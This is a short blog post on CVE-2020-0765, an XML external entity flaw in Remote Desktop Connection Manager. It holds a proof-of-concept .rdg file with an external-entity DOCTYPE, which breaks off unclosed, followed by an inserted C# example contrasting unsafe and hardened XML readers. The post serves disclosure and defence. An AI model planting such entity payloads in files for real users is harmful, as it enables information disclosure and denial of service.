March 11, 2020

CVE-2020-0765: Quick proof of concept

Remote Desktop Connection Manager (RDCMan) spins up ancient XmlReader and XmlTextReader instances without considering DTD and entity handling, resulting in a bag of information disclosure (and denial of service) vulnerabilities. Here's a quick .rdg I put together to test against.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ENTITY foo SYSTEM "http://localhost:11223/">]>
<RDCMan programVersion="2.7" schemaVersion="3">
  <credentialsProfiles />
  <connected />
  <favorites />
  <recentlyUsed />
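For comparison, the two reader constructions the post is contrasting, as an added C# example that is not RDCMan's code: the legacy XmlTextReader (which parses the internal DTD subset and resolves external entities through its default XmlUrlResolver) beside an XmlReader created with settings that prohibit DTDs and carry no resolver. The embedded .rdg is a constructed sample that reuses the DOCTYPE from the post with a closed root element; the entity is declared but never referenced, so the legacy path parses it without fetching anything, while the hardened path rejects the DOCTYPE outright.

```csharp
using System;
using System.IO;
using System.Xml;

// Added example (not RDCMan's code): legacy XmlTextReader defaults versus a
// hardened XmlReader that refuses DTDs and has no resolver.
static class RdgParsing
{
    // Constructed sample .rdg: the DOCTYPE from the post, entity declared but
    // not referenced, root element closed so the document is well-formed.
    public const string SampleRdg = @"<?xml version=""1.0"" encoding=""utf-8""?>
<!DOCTYPE foo [
<!ENTITY foo SYSTEM ""http://localhost:11223/"">]>
<RDCMan programVersion=""2.7"" schemaVersion=""3"">
  <credentialsProfiles />
  <connected />
  <favorites />
  <recentlyUsed />
</RDCMan>";

    // Legacy construction. XmlTextReader.DtdProcessing defaults to Parse and
    // its XmlResolver defaults to XmlUrlResolver, so any referenced external
    // entity would be fetched over the network or from disk.
    public static int CountElementsLegacy(string xml)
    {
        using (var reader = new XmlTextReader(new StringReader(xml)))
        {
            int count = 0;
            while (reader.Read())
                if (reader.NodeType == XmlNodeType.Element) count++;
            return count;
        }
    }

    // Hardened construction. DtdProcessing.Prohibit makes any DOCTYPE a parse
    // error; a null XmlResolver guarantees no external fetch even if DTD
    // processing were later relaxed to Ignore.
    public static int CountElementsHardened(string xml)
    {
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Prohibit,
            XmlResolver = null,
        };
        using (var reader = XmlReader.Create(new StringReader(xml), settings))
        {
            int count = 0;
            while (reader.Read())
                if (reader.NodeType == XmlNodeType.Element) count++;
            return count;
        }
    }

    static void Main()
    {
        // Legacy reader accepts the DOCTYPE and counts the five elements.
        Console.WriteLine("legacy:   " + CountElementsLegacy(SampleRdg) + " elements");

        // Hardened reader throws XmlException on the DOCTYPE before reading
        // any element content.
        try
        {
            Console.WriteLine("hardened: " + CountElementsHardened(SampleRdg) + " elements");
        }
        catch (XmlException ex)
        {
            Console.WriteLine("hardened: rejected - " + ex.Message);
        }
    }
}
```

Where an application genuinely needs to read files that carry a DOCTYPE, the weaker fallback is DtdProcessing.Ignore with XmlResolver = null; that still leaves entity-expansion denial of service on the table, which is why Prohibit is the right default for a configuration file format that never legitimately uses a DTD.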